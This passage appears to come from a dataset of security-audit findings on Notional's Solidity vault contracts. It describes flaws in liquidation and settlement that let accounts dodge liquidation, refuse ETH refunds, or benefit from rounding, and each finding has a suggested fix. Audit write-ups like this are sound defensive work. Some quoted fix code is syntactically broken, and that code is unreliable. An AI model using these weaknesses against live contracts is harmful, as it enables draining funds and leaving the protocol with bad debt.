account\\n`minBorrowSize` is always a positive value that represents the minimal borrow size of a specific currency (It is stored as uint32 in storage)\\nIf liquidating past the debt outstanding above the min borrow, then the entire debt outstanding must be liquidated.\\nAssume the following scenario:\\n`depositUnderlyingInternal` = `70 USDC`\\n`h.debtOutstanding[currencyIndex]` = `-100 USDC`\\n`minBorrowSize` = `50 USDC`\\nIf the liquidation is successful, the vault account should be left with `-30 USDC` debt outstanding because `70 USDC` has been paid off by the liquidator. However, this should not happen under normal circumstances because the debt outstanding (-30) does not meet the minimal borrow size of `50 USDC` and the liquidation should revert/fail.\\nThe following piece of validation logic attempts to ensure that all outstanding debt is liquidated if post-liquidation debt does not meet the minimal borrowing size.\\n```\\nrequire(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n);\\n```\\n\\nPlugging in the values from our scenario to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n (-100 USDC - 70 USDC) < 50 USDC\\n);\\n===>\\nrequire(\\n (-170 USDC) < 50 USDC\\n);\\n===>\\nrequire(true) // no revert\\n```\\n\\nThe above shows that it is possible for someone to liquidate past the debt outstanding above the min borrow without liquidating the entire debt outstanding. This shows that the math formula in the code is incorrect and not working as intended.","Update the formula to as follows:\\n```\\nrequire(\\n// Remove the line below\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n// Add the line below\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) > minBorrowSize,\\n ""Must Liquidate All Debt""\\n);\\n```\\n\\nPlugging in the values from our scenario again to verify if the code will revert if the debt outstanding does not meet the minimal borrow size.\\n```\\nrequire(\\n ((-100 USDC).neg() - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (100 USDC - 70 USDC) > 50 USDC\\n);\\n===>\\nrequire(\\n (30 USDC) > 50 USDC\\n);\\n===>\\nrequire(false) // revert\\n```\\n\\nThe above will trigger a revert as expected when the debt outstanding does not meet the minimal borrow size.","A liquidation can bring an account below the minimum debt. Accounts smaller than the minimum debt are not profitable to unwind if it needs to liquidate (Reference)\\nAs a result, liquidators are not incentivized to liquidate those undercollateralized positions. This might leave the protocol with bad debts, potentially leading to insolvency if the bad debts accumulate.","```\\nFile: VaultValuation.sol\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n```\\n" +Vaults can avoid liquidations by not letting their vault account be settled,high,"Vault liquidations will leave un-matured accounts with cash holdings which are then used to offset account debt during vault account settlements. As it stands, any excess cash received via interest accrual will be transferred back to the vault account directly. If a primary or secondary borrow currency is `ETH`, then this excess cash will be transferred natively. Consequently, the recipient may intentionally revert, causing account settlement to fail.\\nThe issue arises in the `VaultAccount.repayAccountPrimeDebtAtSettlement()` function. If there is any excess cash due to interest accrual, then this amount will be refunded to the vault account. Native `ETH` is not wrapped when it should be wrapped, allowing the recipient to take control over the flow of execution.\\n```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n\\nAs seen here, a `withdrawWrappedNativeToken` is used to signify when a native `ETH` transfer will be wrapped before sending an amount. In the case of vault settlement, this is always sent to `false`.\\n```\\nFile: TokenHandler.sol\\n function withdrawPrimeCash(\\n address account,\\n uint16 currencyId,\\n int256 primeCashToWithdraw,\\n PrimeRate memory primeRate,\\n bool withdrawWrappedNativeToken\\n ) internal returns (int256 netTransferExternal) {\\n if (primeCashToWithdraw == 0) return 0;\\n require(primeCashToWithdraw < 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n netTransferExternal = convertToExternal(\\n underlying, \\n primeRate.convertToUnderlying(primeCashToWithdraw) \\n );\\n\\n // Overflow not possible due to int256\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n _redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n\\n if (underlying.tokenType == TokenType.Ether) {\\n GenericToken.transferNativeTokenOut(account, withdrawAmount, withdrawWrappedNativeToken);\\n } else {\\n GenericToken.safeTransferOut(underlying.tokenAddress, account, withdrawAmount);\\n }\\n\\n _postTransferPrimeCashUpdate(account, currencyId, netTransferExternal, underlying, primeRate);\\n }\\n```\\n\\nIt's likely that the vault account is considered solvent in this case, but due to the inability to trade between currencies, it is not possible to use excess cash in one currency to offset debt in another.",Consider wrapping `ETH` under all circumstances. This will prevent vault accounts from intentionally reverting and preventing their account from being settled.,"Liquidations require vaults to be settled if `block.timestamp` is past the maturity date, hence, it is not possible to deleverage vault accounts, leading to bad debt accrual.","```\\nFile: VaultAccount.sol\\n function repayAccountPrimeDebtAtSettlement(\\n PrimeRate memory pr,\\n VaultStateStorage storage primeVaultState,\\n uint16 currencyId,\\n address vault,\\n address account,\\n int256 accountPrimeCash,\\n int256 accountPrimeStorageValue\\n ) internal returns (int256 finalPrimeDebtStorageValue, bool didTransfer) {\\n didTransfer = false;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue;\\n \\n if (accountPrimeCash > 0) {\\n // netPrimeDebtRepaid is a negative number\\n int256 netPrimeDebtRepaid = pr.convertUnderlyingToDebtStorage(\\n pr.convertToUnderlying(accountPrimeCash).neg()\\n );\\n\\n int256 netPrimeDebtChange;\\n if (netPrimeDebtRepaid < accountPrimeStorageValue) {\\n // If the net debt change is greater than the debt held by the account, then only\\n // decrease the total prime debt by what is held by the account. The residual amount\\n // will be refunded to the account via a direct transfer.\\n netPrimeDebtChange = accountPrimeStorageValue;\\n finalPrimeDebtStorageValue = 0;\\n\\n int256 primeCashRefund = pr.convertFromUnderlying(\\n pr.convertDebtStorageToUnderlying(netPrimeDebtChange.sub(accountPrimeStorageValue))\\n );\\n TokenHandler.withdrawPrimeCash(\\n account, currencyId, primeCashRefund, pr, false // ETH will be transferred natively\\n );\\n didTransfer = true;\\n } else {\\n // In this case, part of the account's debt is repaid.\\n netPrimeDebtChange = netPrimeDebtRepaid;\\n finalPrimeDebtStorageValue = accountPrimeStorageValue.sub(netPrimeDebtRepaid);\\n }\\n\\n // Updates the global prime debt figure and events are emitted via the vault.\\n pr.updateTotalPrimeDebt(vault, currencyId, netPrimeDebtChange);\\n\\n // Updates the state on the prime vault storage directly.\\n int256 totalPrimeDebt = int256(uint256(primeVaultState.totalDebt));\\n int256 newTotalDebt = totalPrimeDebt.add(netPrimeDebtChange);\\n // Set the total debt to the storage value\\n primeVaultState.totalDebt = newTotalDebt.toUint().toUint80();\\n }\\n }\\n```\\n" +Possible to create vault positions ineligible for liquidation,high,"Users can self-liquidate their secondary debt holdings in such a way that it is no longer possible to deleverage their vault account as `checkMinBorrow` will fail post-maturity.\\nWhen deleveraging a vault account, the liquidator will pay down account debt directly and the account will not accrue any cash. Under most circumstances, it is not possible to put an account's debt below its minimum borrow size.\\nHowever, there are two exceptions to this:\\nLiquidators purchasing cash from a vault account. This only applies to non-prime vault accounts.\\nA vault account is being settled and `checkMinBorrow` is skipped to ensure an account can always be settled.\\n```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n\\n`currencyIndex` represents which currency is being liquidated and `depositUnderlyingInternal` the amount of debt being reduced. Only one currency's debt can be updated here.\\n```\\nFile: VaultLiquidationAction.sol\\n function _reduceAccountDebt(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount,\\n PrimeRate memory primeRate,\\n uint256 currencyIndex,\\n int256 depositUnderlyingInternal,\\n bool checkMinBorrow\\n ) private {\\n if (currencyIndex == 0) {\\n vaultAccount.updateAccountDebt(vaultState, depositUnderlyingInternal, 0);\\n vaultState.setVaultState(vaultConfig);\\n } else {\\n // Only set one of the prime rates, the other prime rate is not used since\\n // the net debt amount is set to zero\\n PrimeRate[2] memory pr;\\n pr[currencyIndex - 1] = primeRate;\\n\\n VaultSecondaryBorrow.updateAccountSecondaryDebt(\\n vaultConfig,\\n vaultAccount.account,\\n vaultAccount.maturity,\\n currencyIndex == 1 ? depositUnderlyingInternal : 0,\\n currencyIndex == 2 ? depositUnderlyingInternal : 0,\\n pr,\\n checkMinBorrow\\n );\\n }\\n }\\n```\\n\\nIn the case of vault settlement, through self-liquidation, users can setup their debt and cash holdings post-settlement, such that both `accountDebtOne` and `accountDebtTwo` are non-zero and less than `vaultConfig.minAccountSecondaryBorrow`. The objective would be to have zero primary debt and `Y` secondary debt and `X` secondary cash. Post-settlement, cash is used to offset debt (Y - `X` < minAccountSecondaryBorrow) and due to the lack of `checkMinBorrow` in `VaultAccountAction.settleVaultAccount()`, both secondary currencies can have debt holdings below the minimum amount.\\nNow when `deleverageAccount()` is called on a prime vault account, debts are paid down directly. However, if we are only able to pay down one secondary currency at a time, `checkMinBorrow` will fail in `VaultSecondaryBorrow.updateAccountSecondaryDebt()` because both debts are checked.\\n```\\nFile: VaultSecondaryBorrow.sol\\n if (checkMinBorrow) {\\n // No overflow on negation due to overflow checks above\\n require(accountDebtOne == 0 || vaultConfig.minAccountSecondaryBorrow[0] <= -accountDebtOne, ""min borrow"");\\n require(accountDebtTwo == 0 || vaultConfig.minAccountSecondaryBorrow[1] <= -accountDebtTwo, ""min borrow"");\\n }\\n```\\n\\nNo prime fees accrue on secondary debt, hence, this debt will never reach a point where it is above the minimum borrow amount.",Either allow for multiple currencies to be liquidated or ensure that `checkMinBorrow` is performed only on the currency which is being liquidated.,"Malicious actors can generate vault accounts which cannot be liquidated. Through opening numerous vault positions, Notional can rack up significant exposure and accrue bad debt as a result.","```\\nFile: VaultLiquidationAction.sol\\n function deleverageAccount(\\n address account,\\n address vault,\\n address liquidator,\\n uint16 currencyIndex,\\n int256 depositUnderlyingInternal\\n ) external payable nonReentrant override returns (\\n uint256 vaultSharesToLiquidator,\\n int256 depositAmountPrimeCash\\n ) {\\n require(currencyIndex < 3);\\n (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) = _authenticateDeleverage(account, vault, liquidator);\\n\\n PrimeRate memory pr;\\n // Currency Index is validated in this method\\n (\\n depositUnderlyingInternal,\\n vaultSharesToLiquidator,\\n pr\\n ) = IVaultAccountHealth(address(this)).calculateDepositAmountInDeleverage(\\n currencyIndex, vaultAccount, vaultConfig, vaultState, depositUnderlyingInternal\\n );\\n\\n uint16 currencyId = vaultConfig.borrowCurrencyId;\\n if (currencyIndex == 1) currencyId = vaultConfig.secondaryBorrowCurrencies[0];\\n else if (currencyIndex == 2) currencyId = vaultConfig.secondaryBorrowCurrencies[1];\\n\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // Excess ETH is returned to the liquidator natively\\n (/* */, depositAmountPrimeCash) = TokenHandler.depositUnderlyingExternal(\\n liquidator, currencyId, token.convertToExternal(depositUnderlyingInternal), pr, false \\n );\\n\\n // Do not skip the min borrow check here\\n vaultAccount.vaultShares = vaultAccount.vaultShares.sub(vaultSharesToLiquidator);\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Vault account will not incur a cash balance if they are in the prime cash maturity, their debts\\n // will be paid down directly.\\n _reduceAccountDebt(\\n vaultConfig, vaultState, vaultAccount, pr, currencyIndex, depositUnderlyingInternal, true\\n );\\n depositAmountPrimeCash = 0;\\n }\\n\\n // Check min borrow in this liquidation method, the deleverage calculation should adhere to the min borrow\\n vaultAccount.setVaultAccountForLiquidation(vaultConfig, currencyIndex, depositAmountPrimeCash, true);\\n\\n emit VaultDeleverageAccount(vault, account, currencyId, vaultSharesToLiquidator, depositAmountPrimeCash);\\n emit VaultLiquidatorProfit(vault, account, liquidator, vaultSharesToLiquidator, true);\\n\\n _transferVaultSharesToLiquidator(\\n liquidator, vaultConfig, vaultSharesToLiquidator, vaultAccount.maturity\\n );\\n\\n Emitter.emitVaultDeleverage(\\n liquidator, account, vault, currencyId, vaultState.maturity,\\n depositAmountPrimeCash, vaultSharesToLiquidator\\n );\\n }\\n```\\n" +Partial liquidations are not possible,high,"Due to an incorrect implementation of `VaultValuation.getLiquidationFactors()`, Notional requires that a liquidator reduces an account's debt below `minBorrowSize`. This does not allow liquidators to partially liquidate a vault account into a healthy position and opens up the protocol to an edge case where an account is always ineligible for liquidation.\\nWhile `VaultValuation.getLiquidationFactors()` might allow for the resultant outstanding debt to be below the minimum borrow amount and non-zero, `deleverageAccount()` will revert due to `checkMinBorrow` being set to `true`. Therefore, the only option is for liquidators to wipe the outstanding debt entirely but users can set up their vault accounts such that that `maxLiquidatorDepositLocal` is less than each of the vault currency's outstanding debt.\\n```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n\\nIf `depositUnderlyingInternal >= maxLiquidatorDepositLocal`, then the liquidator's deposit is capped to `maxLiquidatorDepositLocal`. However, `maxLiquidatorDepositLocal` may put the vault account's outstanding debt below the minimum borrow amount but not to zero.\\nHowever, because it is not possible to partially liquidate the account's debt, we reach a deadlock where it isn't possible to liquidate all outstanding debt and it also isn't possible to liquidate debt partially. So even though it may be possible to liquidate an account into a healthy position, the current implementation doesn't always allow for this to be true.","`VaultValuation.getLiquidationFactors()` must be updated to allow for partial liquidations.\\n```\\nFile: VaultValuation.sol\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) >= minBorrowSize,\\n || h.debtOutstanding[currencyIndex].neg().sub(depositUnderlyingInternal) == 0\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n",Certain vault positions will never be eligible for liquidation and hence Notional may be left with bad debt. Liquidity providers will lose funds as they must cover the shortfall for undercollateralised positions.,"```\\nFile: VaultValuation.sol\\n int256 maxLiquidatorDepositLocal = _calculateDeleverageAmount(\\n vaultConfig,\\n h.vaultShareValueUnderlying,\\n h.totalDebtOutstandingInPrimary.neg(),\\n h.debtOutstanding[currencyIndex].neg(),\\n minBorrowSize,\\n exchangeRate,\\n er.rateDecimals\\n );\\n\\n // NOTE: deposit amount is always positive in this method\\n if (depositUnderlyingInternal < maxLiquidatorDepositLocal) {\\n // If liquidating past the debt outstanding above the min borrow, then the entire\\n // debt outstanding must be liquidated.\\n\\n // (debtOutstanding - depositAmountUnderlying) is the post liquidation debt. As an\\n // edge condition, when debt outstanding is discounted to present value, the account\\n // may be liquidated to zero while their debt outstanding is still greater than the\\n // min borrow size (which is normally enforced in notional terms -- i.e. non present\\n // value). Resolving this would require additional complexity for not much gain. An\\n // account within 20% of the minBorrowSize in a vault that has fCash discounting enabled\\n // may experience a full liquidation as a result.\\n require(\\n h.debtOutstanding[currencyIndex].sub(depositUnderlyingInternal) < minBorrowSize,\\n ""Must Liquidate All Debt""\\n );\\n } else {\\n // If the deposit amount is greater than maxLiquidatorDeposit then limit it to the max\\n // amount here.\\n depositUnderlyingInternal = maxLiquidatorDepositLocal;\\n }\\n```\\n" +Vault accounts with excess cash can avoid being settled,high,"If excess cash was transferred out from an account during account settlement, then the protocol will check the account's collateral ratio and revert if the position is unhealthy. Because it may not be possible to settle a vault account, liquidators cannot reduce account debt by purchasing vault shares because `_authenticateDeleverage()` will check to see if a vault has matured.\\nConsidering an account's health is determined by a combination of its outstanding debt, cash holdings and the total underlying value of its vault shares, transferring out excess cash may actually put an account in an unhealthy position.\\n```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n\\nIt is important to note that all vault liquidation actions require a vault to first be settled. Hence, through self-liquidation, sophisticated vault accounts can have excess cash in one currency and significant debt holdings in the vault's other currencies.\\n```\\nFile: VaultLiquidationAction.sol\\n function _authenticateDeleverage(\\n address account,\\n address vault,\\n address liquidator\\n ) private returns (\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n VaultState memory vaultState\\n ) {\\n // Do not allow invalid accounts to liquidate\\n requireValidAccount(liquidator);\\n require(liquidator != vault);\\n\\n // Cannot liquidate self, if a vault needs to deleverage itself as a whole it has other methods \\n // in VaultAction to do so.\\n require(account != msg.sender);\\n require(account != liquidator);\\n\\n vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n require(vaultConfig.getFlag(VaultConfiguration.DISABLE_DELEVERAGE) == false);\\n\\n // Authorization rules for deleveraging\\n if (vaultConfig.getFlag(VaultConfiguration.ONLY_VAULT_DELEVERAGE)) {\\n require(msg.sender == vault);\\n } else {\\n require(msg.sender == liquidator);\\n }\\n\\n vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n\\n // Vault accounts that are not settled must be settled first by calling settleVaultAccount\\n // before liquidation. settleVaultAccount is not permissioned so anyone may settle the account.\\n require(block.timestamp < vaultAccount.maturity, ""Must Settle"");\\n\\n if (vaultAccount.maturity == Constants.PRIME_CASH_VAULT_MATURITY) {\\n // Returns the updated prime vault state\\n vaultState = vaultAccount.accruePrimeCashFeesToDebtInLiquidation(vaultConfig);\\n } else {\\n vaultState = VaultStateLib.getVaultState(vaultConfig, vaultAccount.maturity);\\n }\\n }\\n```\\n\\nConsider the following example:\\nAlice has a valid borrow position in the vault which is considered risky. She has a small bit of secondary cash but most of her debt is primary currency denominated. Generally speaking her vault is healthy. Upon settlement, the small bit of excess secondary cash is transferred out and her vault is undercollateralised and eligible for liquidation. However, we are deadlocked because it is not possible to settle the vault because `checkVaultAccountCollateralRatio()` will fail, and it's not possible to purchase the excess cash and offset the debt directly via `liquidateVaultCashBalance()` or `deleverageAccount()` because `_authenticateDeleverage()` will revert if a vault has not yet been settled.","Consider adding a liquidation method which settles a vault account and allows for a liquidator to purchase vault shares, offsetting outstanding debt, before performing collateral ratio checks.",Vault accounts can create positions which will never be eligible for liquidation and the protocol may accrue bad debt.,"```\\nFile: VaultAccountAction.sol\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool didSettle, bool didTransfer) = vaultAccount.settleVaultAccount(vaultConfig);\\n require(didSettle, ""No Settle"");\\n\\n vaultAccount.accruePrimeCashFeesToDebt(vaultConfig);\\n\\n // Skip Min Borrow Check so that accounts can always be settled\\n vaultAccount.setVaultAccount({vaultConfig: vaultConfig, checkMinBorrow: false});\\n\\n if (didTransfer) {\\n // If the vault did a transfer (i.e. withdrew cash) we have to check their collateral ratio. There\\n // is an edge condition where a vault with secondary borrows has an emergency exit. During that process\\n // an account will be left some cash balance in both currencies. It may have excess cash in one and\\n // insufficient cash in the other. A withdraw of the excess in one side will cause the vault account to\\n // be insolvent if we do not run this check. If this scenario indeed does occur, the vault itself must\\n // be upgraded in order to facilitate orderly exits for all of the accounts since they will be prevented\\n // from settling.\\n IVaultAccountHealth(address(this)).checkVaultAccountCollateralRatio(vault, account);\\n }\\n }\\n```\\n" +convertFromStorage() fails to use rounding-up when converting a negative storedCashBalance into signedPrimeSupplyValue.,medium,"`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`.\\n`convertFromStorage()` is used to convert `storedCashBalance` into `signedPrimeSupplyValue`. When `storedCashBalance` is negative, it represents a debt - positive prime cash owed.\\nUnfortunately, when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`, the following division will apply a rounding-down (near zero) mode, leading to a user to owe less than it is supposed to be.\\n```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n\\nThis is not acceptable. Typically, rounding should be in favor of the protocol, not in favor of the user to prevent draining of the protocol and losing funds of the protocol.\\nThe following POC shows a rounding-down will happen for a negative value division. The result of the following test is -3.\\n```\\nfunction testMod() public {\\n \\n int256 result = -14;\\n result = result / 4;\\n console2.logInt(result);\\n }\\n```\\n","Use rounding-up instead.\\n```\\nfunction convertFromStorage(\\n PrimeRate memory pr,\\n int256 storedCashBalance\\n ) internal pure returns (int256 signedPrimeSupplyValue) {\\n if (storedCashBalance >= 0) {\\n return storedCashBalance;\\n } else {\\n // Convert negative stored cash balance to signed prime supply value\\n // signedPrimeSupply = (negativePrimeDebt * debtFactor) / supplyFactor\\n\\n // cashBalance is stored as int88, debt factor is uint80 * uint80 so there\\n // is no chance of phantom overflow (88 // Add the line below\\n 80 // Add the line below\\n 80 = 248) on mul\\n// Remove the line below\\n return storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n// Add the line below\\n return (storedCashBalance.mul(pr.debtFactor).sub(pr.supplyFactor// Remove the line below\\n1)).div(pr.supplyFactor);\\n }\\n }\\n```\\n","`convertFromStorage()` fails to use rounding-up when converting a negative `storedCashBalance` into `signedPrimeSupplyValue`. The protocol is losing some dusts amount, but it can be accumulative or a vulnerability that can be exploited.",```\\nreturn storedCashBalance.mul(pr.debtFactor).div(pr.supplyFactor);\\n```\\n +Cannot permissionless settle the vault account if the user use a blacklisted account,medium,"Cannot permissionless settle the vault account if the user use a blacklisted account\\nIn VaultAccoutnAction.sol, one of the critical function is\\n```\\n /// @notice Settles a matured vault account by transforming it from an fCash maturity into\\n /// a prime cash account. This method is not authenticated, anyone can settle a vault account\\n /// without permission. Generally speaking, this action is economically equivalent no matter\\n /// when it is called. In some edge conditions when the vault is holding prime cash, it is\\n /// advantageous for the vault account to have this called sooner. All vault account actions\\n /// will first settle the vault account before taking any further actions.\\n /// @param account the address to settle\\n /// @param vault the vault the account is in\\n function settleVaultAccount(address account, address vault) external override nonReentrant {\\n requireValidAccount(account);\\n require(account != vault);\\n\\n VaultConfig memory vaultConfig = VaultConfiguration.getVaultConfigStateful(vault);\\n VaultAccount memory vaultAccount = VaultAccountLib.getVaultAccount(account, vaultConfig);\\n \\n // Require that the account settled, otherwise we may leave the account in an unintended\\n // state in this method because we allow it to skip the min borrow check in the next line.\\n (bool 